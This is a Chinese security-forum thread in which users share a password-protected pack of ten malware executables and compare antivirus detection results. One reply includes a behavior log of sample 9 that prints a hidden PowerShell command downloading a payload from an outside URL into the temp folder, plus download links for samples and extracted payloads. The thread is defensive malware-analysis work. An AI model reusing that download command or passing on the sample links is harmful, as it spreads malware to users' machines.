查看: 2549|回复: 24
收起左侧

[病毒样本] EXE样本10X_2

[复制链接]
www-tekeze
发表于 2019-9-12 15:19:45 | 显示全部楼层 |阅读模式

RT,想双击自己改后缀,风险自负。。   



载点:https://www.lanzous.com/i64uuuf    密码:infected



小岛花六
发表于 2019-9-12 15:27:17 | 显示全部楼层


清除4个,6个上报AI

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1人气 +1 收起 理由
www-tekeze + 1 沙发加分!

查看全部评分

FD丶纸鸢
发表于 2019-9-12 15:27:22 | 显示全部楼层
卡巴剩下的几个打算双击

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
小岛花六
发表于 2019-9-12 15:29:03 | 显示全部楼层
FD丶纸鸢 发表于 2019-9-12 15:27
卡巴剩下的几个打算双击

祝你好运
FD丶纸鸢
发表于 2019-9-12 15:32:02 | 显示全部楼层
本帖最后由 FD丶纸鸢 于 2019-9-12 15:34 编辑

samp4释放了几个文件 运行两分钟卡巴未报毒 系统未见异常现象 提取衍生物打包上传(https://www.lanzous.com/i64v5fg

samp6就是传奇的释放器 没什么问题

samp9调用了powershell 卡巴仍然miss  将会详细分析
evans168
发表于 2019-9-12 15:43:01 | 显示全部楼层
Norton 剩樣8沒殺

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
FD丶纸鸢
发表于 2019-9-12 15:46:39 | 显示全部楼层
本帖最后由 FD丶纸鸢 于 2019-9-12 15:49 编辑

samp9的exeinfope信息(图1
运行samp9后感觉打开网页速度慢了些 不知道是不是心理作用


使用file analysis分析 结果如下:
  1. 15:35:49[1]:(允许)程序启动:File_Analysis 行为记录成功开启   规则版本:2.9.0.0

  2. 15:35:49[2]:(允许)载入动态链接库:api-ms-win-core-synch-l1-2-0

  3. 15:35:49[3]:(允许)字符串3:api-ms-win-core-synch-l1-2-0

  4. 15:35:49[4]:(允许)字符串3:C:\Windows\system32

  5. 15:35:49[5]:(允许)字符串3:C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL

  6. 15:35:49[6]:(允许)映射动态链接库:ntdll.dll

  7. 15:35:49[7]:(允许)加载库文件:ntdll.dll     函数名:NtOpenKey

  8. 15:35:49[8]:(允许)字符串3:Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

  9. 15:35:49[9]:(允许)字符串3:C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL

  10. 15:35:49[10]:(允许)字符串3:C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL\

  11. 15:35:49[11]:(允许)内联文件路径:C:\Windows\system32\api-ms-win-core-synch-l1-2-0.DLL\

  12. 15:35:49[12]:(允许)内联文件路径:C:\Windows\system32\

  13. 15:35:49[14]:(允许)内联文件路径:C:\Windows\

  14. 15:35:49[16]:(允许)字符串3:\\.\MountPointManager

  15. 15:35:49[17]:(允许)内联文件路径:\\.\MountPointManager

  16. 15:35:49[18]:(允许)字符串3:Windows

  17. 15:35:49[19]:(允许)字符串3:SysWOW64

  18. 15:35:49[20]:(允许)加载库文件:ntdll.dll     函数名:InitializeCriticalSectionEx

  19. 15:35:49[21]:(允许)载入动态链接库:api-ms-win-core-fibers-l1-1-1

  20. 15:35:49[22]:(允许)字符串3:api-ms-win-core-fibers-l1-1-1

  21. 15:35:49[23]:(允许)字符串3:C:\Windows\system32

  22. 15:35:49[24]:(允许)载入动态链接库:kernel32

  23. 15:35:49[25]:(允许)字符串3:kernel32

  24. 15:35:49[26]:(允许)字符串3:C:\Windows\system32

  25. 15:35:49[27]:(允许)加载库文件:kernel32     函数名:FlsAlloc

  26. 15:35:49[28]:(允许)加载库文件:kernel32     函数名:FlsSetValue

  27. 15:35:49[29]:(允许)载入动态链接库:api-ms-win-core-synch-l1-2-0

  28. 15:35:49[30]:(允许)字符串3:api-ms-win-core-synch-l1-2-0

  29. 15:35:49[31]:(允许)字符串3:C:\Windows\system32

  30. 15:35:49[32]:(允许)加载库文件:api-ms-win-core-synch-l1-2-0     函数名:InitializeCriticalSectionEx

  31. 15:35:49[33]:(允许)载入动态链接库:api-ms-win-core-fibers-l1-1-1

  32. 15:35:49[34]:(允许)字符串3:api-ms-win-core-fibers-l1-1-1

  33. 15:35:49[35]:(允许)字符串3:C:\Windows\system32

  34. 15:35:49[36]:(允许)载入动态链接库:kernel32

  35. 15:35:49[37]:(允许)字符串3:kernel32

  36. 15:35:49[38]:(允许)字符串3:C:\Windows\system32

  37. 15:35:49[39]:(允许)加载库文件:kernel32     函数名:FlsAlloc

  38. 15:35:49[40]:(允许)加载库文件:kernel32     函数名:FlsGetValue

  39. 15:35:49[41]:(允许)加载库文件:kernel32     函数名:FlsSetValue

  40. 15:35:49[42]:(允许)载入动态链接库:api-ms-win-core-localization-l1-2-1

  41. 15:35:49[43]:(允许)字符串3:api-ms-win-core-localization-l1-2-1

  42. 15:35:49[44]:(允许)字符串3:C:\Windows\system32

  43. 15:35:49[45]:(允许)加载库文件:api-ms-win-core-localization-l1-2-1     函数名:LCMapStringEx

  44. 15:35:49[46]:(允许)映射动态链接库:kernel32.dll

  45. 15:35:49[47]:(允许)加载库文件:kernel32.dll     函数名:FlsAlloc

  46. 15:35:49[48]:(允许)加载库文件:kernel32.dll     函数名:FlsFree

  47. 15:35:49[49]:(允许)加载库文件:kernel32.dll     函数名:FlsGetValue

  48. 15:35:49[50]:(允许)加载库文件:kernel32.dll     函数名:FlsSetValue

  49. 15:35:49[51]:(允许)加载库文件:kernel32.dll     函数名:InitializeCriticalSectionEx

  50. 15:35:49[52]:(允许)加载库文件:kernel32.dll     函数名:InitOnceExecuteOnce

  51. 15:35:49[53]:(允许)加载库文件:kernel32.dll     函数名:CreateEventExW

  52. 15:35:49[54]:(允许)加载库文件:kernel32.dll     函数名:CreateSemaphoreW

  53. 15:35:49[55]:(允许)加载库文件:kernel32.dll     函数名:CreateSemaphoreExW

  54. 15:35:49[56]:(允许)加载库文件:kernel32.dll     函数名:CreateThreadpoolTimer

  55. 15:35:49[57]:(允许)加载库文件:kernel32.dll     函数名:SetThreadpoolTimer

  56. 15:35:49[58]:(允许)加载库文件:kernel32.dll     函数名:WaitForThreadpoolTimerCallbacks

  57. 15:35:49[59]:(允许)加载库文件:kernel32.dll     函数名:CloseThreadpoolTimer

  58. 15:35:49[60]:(允许)加载库文件:kernel32.dll     函数名:CreateThreadpoolWait

  59. 15:35:49[61]:(允许)加载库文件:kernel32.dll     函数名:SetThreadpoolWait

  60. 15:35:49[62]:(允许)加载库文件:kernel32.dll     函数名:CloseThreadpoolWait

  61. 15:35:49[63]:(允许)加载库文件:kernel32.dll     函数名:FlushProcessWriteBuffers

  62. 15:35:49[64]:(允许)加载库文件:kernel32.dll     函数名:FreeLibraryWhenCallbackReturns

  63. 15:35:49[65]:(允许)加载库文件:kernel32.dll     函数名:GetCurrentProcessorNumber

  64. 15:35:49[66]:(允许)加载库文件:kernel32.dll     函数名:CreateSymbolicLinkW

  65. 15:35:49[67]:(允许)加载库文件:kernel32.dll     函数名:GetCurrentPackageId

  66. 15:35:49[68]:(允许)加载库文件:kernel32.dll     函数名:GetTickCount64

  67. 15:35:49[69]:(允许)加载库文件:kernel32.dll     函数名:GetFileInformationByHandleEx

  68. 15:35:49[70]:(允许)加载库文件:kernel32.dll     函数名:SetFileInformationByHandle

  69. 15:35:49[71]:(允许)加载库文件:kernel32.dll     函数名:GetSystemTimePreciseAsFileTime

  70. 15:35:49[72]:(允许)加载库文件:kernel32.dll     函数名:InitializeConditionVariable

  71. 15:35:49[73]:(允许)加载库文件:kernel32.dll     函数名:WakeConditionVariable

  72. 15:35:49[74]:(允许)加载库文件:kernel32.dll     函数名:WakeAllConditionVariable

  73. 15:35:49[75]:(允许)加载库文件:kernel32.dll     函数名:SleepConditionVariableCS

  74. 15:35:49[76]:(允许)加载库文件:kernel32.dll     函数名:InitializeSRWLock

  75. 15:35:49[77]:(允许)加载库文件:kernel32.dll     函数名:AcquireSRWLockExclusive

  76. 15:35:49[78]:(允许)加载库文件:kernel32.dll     函数名:TryAcquireSRWLockExclusive

  77. 15:35:49[79]:(允许)加载库文件:kernel32.dll     函数名:ReleaseSRWLockExclusive

  78. 15:35:49[80]:(允许)加载库文件:kernel32.dll     函数名:SleepConditionVariableSRW

  79. 15:35:49[81]:(允许)加载库文件:kernel32.dll     函数名:CreateThreadpoolWork

  80. 15:35:49[82]:(允许)加载库文件:kernel32.dll     函数名:SubmitThreadpoolWork

  81. 15:35:49[83]:(允许)加载库文件:kernel32.dll     函数名:CloseThreadpoolWork

  82. 15:35:49[84]:(允许)加载库文件:kernel32.dll     函数名:CompareStringEx

  83. 15:35:49[85]:(允许)加载库文件:kernel32.dll     函数名:GetLocaleInfoEx

  84. 15:35:49[86]:(允许)加载库文件:kernel32.dll     函数名:LCMapStringEx

  85. 15:35:49[87]:(允许)加载库文件:kernel32.dll     函数名:AreFileApisANSI

  86. 15:35:49[88]:(允许)载入动态链接库:api-ms-win-core-string-l1-1-0

  87. 15:35:49[89]:(允许)字符串3:api-ms-win-core-string-l1-1-0

  88. 15:35:49[90]:(允许)字符串3:C:\Windows\system32

  89. 15:35:49[91]:(允许)加载库文件:api-ms-win-core-string-l1-1-0     函数名:CompareStringEx

  90. 15:35:49[92]:(允许)加载库文件:api-ms-win-core-string-l1-1-0     函数名:EnumSystemLocalesEx

  91. 15:35:49[93]:(允许)载入动态链接库:api-ms-win-core-datetime-l1-1-1

  92. 15:35:49[94]:(允许)字符串3:api-ms-win-core-datetime-l1-1-1

  93. 15:35:49[95]:(允许)字符串3:C:\Windows\system32

  94. 15:35:49[96]:(允许)加载库文件:api-ms-win-core-datetime-l1-1-1     函数名:GetDateFormatEx

  95. 15:35:49[97]:(允许)加载库文件:api-ms-win-core-datetime-l1-1-1     函数名:GetLocaleInfoEx

  96. 15:35:49[98]:(允许)加载库文件:api-ms-win-core-datetime-l1-1-1     函数名:GetTimeFormatEx

  97. 15:35:49[99]:(允许)加载库文件:api-ms-win-core-datetime-l1-1-1     函数名:GetUserDefaultLocaleName

  98. 15:35:49[100]:(允许)加载库文件:api-ms-win-core-datetime-l1-1-1     函数名:IsValidLocaleName

  99. 15:35:49[101]:(允许)载入动态链接库:api-ms-win-core-localization-obsolete-l1-2-0

  100. 15:35:49[102]:(允许)字符串3:api-ms-win-core-localization-obsolete-l1-2-0

  101. 15:35:49[103]:(允许)字符串3:C:\Windows\system32

  102. 15:35:49[104]:(允许)加载库文件:api-ms-win-core-localization-obsolete-l1-2-0     函数名:LCIDToLocaleName

  103. 15:35:49[105]:(允许)加载库文件:api-ms-win-core-localization-obsolete-l1-2-0     函数名:LocaleNameToLCID

  104. 15:35:49[106]:(允许)载入动态链接库:Shell32.dll

  105. 15:35:49[107]:(允许)字符串3:Shell32.dll

  106. 15:35:49[108]:(允许)字符串3:E:\病毒木马分析区\File Analysis\File_safe;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files\Bandizip\

  107. 15:35:49[109]:(允许)加载库文件:Shell32.dll     函数名:ShellExecuteA

  108. 15:35:49[110]:(允许)字符串3:File Analysis

  109. 15:35:49[111]:(允许)字符串3:File_safe

  110. 15:35:49[112]:(阻止)运行程序:C:\Windows\system32\cmd.exe     命令行:cmd.exe /c start /B powershell -windowstyle hidden -command "&{$fp=$env:tmp + '/myhost.exe';$wc=(new-object Net.WebClient);$wc.DownloadFile('https://iplogger.org/1IYwx',$fp)}"E:\病毒木~1\FILEAN~1\FILE_S~1\Samp(9).exe >> NUL

  111. 15:35:49[113]:(允许)映射动态链接库:

  112. 15:35:49[115]:(允许)载入动态链接库:api-ms-win-appmodel-runtime-l1-1-2

  113. 15:35:49[116]:(允许)字符串3:api-ms-win-appmodel-runtime-l1-1-2

  114. 15:35:49[117]:(允许)字符串3:C:\Windows\system32

  115. 15:35:49[118]:(允许)字符串3:E:\病毒木马分析区\File Analysis\File_safe;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files\Bandizip\

  116. 15:35:49[119]:(允许)获取进程快照:Samp(9).exe     进程PID:5908

  117. 15:35:49[120]:(允许)程序退出:File_Analysis 行为记录到此为止
复制代码


魔盾分析:https://www.maldun.com/analysis/YXNkZmRzZmFkc2YzNzIyNjZkc2Zhc2RmYXNkZg==/

微步分析:https://s.threatbook.cn/report/file/048ff62e4576aeadf87dfd2c360138d7a440bed666fb78b313cf09006f5bd980/?sign=history&env=win7_sp1_enx86_office2013

根据微步分析的记录,发现了释放的文件myhost.exe,判断是powershell下载的payload,卡巴仍然miss,打包上传附件


payload的exeinfope信息:(图2


File Analysis尝试分析payload无果 应该是反调试了 判断是威胁

另外这个样本我想亲自提交给卡巴,请问怎么发邮件会有人回复,之前发过两次没人回(哭了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
FD丶纸鸢
发表于 2019-9-12 15:47:28 | 显示全部楼层
@www-tekeze 实体机双击 报告还这么详细 不给发糖吗qwq

评分

参与人数 1人气 +1 收起 理由
www-tekeze + 1 来了来了。。。

查看全部评分

www-tekeze
 楼主| 发表于 2019-9-12 16:10:07 | 显示全部楼层

安天报10项实杀6X,剩: 1,2,4,9 。。。无BD管家,Killed 2X 。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
www-tekeze
 楼主| 发表于 2019-9-12 16:12:51 | 显示全部楼层
FD丶纸鸢 发表于 2019-9-12 15:32
samp4释放了几个文件 运行两分钟卡巴未报毒 系统未见异常现象 提取衍生物打包上传(https://www.lanzous.co ...

#6是传奇的释放器?样本太多没一一试,智量也不报这个。


您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 23:50 , Processed in 0.133991 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表